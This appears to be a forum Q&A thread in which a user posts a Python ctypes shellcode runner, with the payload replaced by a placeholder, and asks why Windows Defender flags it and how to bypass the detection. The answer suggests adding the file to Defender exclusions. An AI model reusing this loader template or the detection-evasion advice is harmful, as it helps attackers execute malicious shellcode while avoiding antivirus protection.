# Windows Defender defines completely harmless code as potentially dangerous software

Tags: python-3.x, ctypes, exploit, shellcode, windows-defender

```
import ctypes

shellcode = bytearray(b"SHELLCODE WAS HERE")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
```

This code places shellcode in memory and executes it, I understand that this is used in exploits, but my code doesn't exploit !

However, windows defender defines the threat as "Exploit: Python / Leivion.A"
Why this is happening and how the trigger can be bypassed ?

Comment: I want to add, I don't develop any malware, I don't like the fact that Windows Defender checks the file every time before I save it, it takes time and triggers a threat message.

Comment: Ha, I actually just wrote some similar code (although mine is for process injection), and Defender flags it as well. Mine makes more sense because I'm creating a remote thread, which is a little sketchier. I wonder if it doesn't like the word "shellcode"?

Answer (score 0):

Windows Defender tends to mark every file that injects `.dll` or `.exe` to process as virus and exploit. You can add your Python file to exclusions in Windows Defender to solve this issue.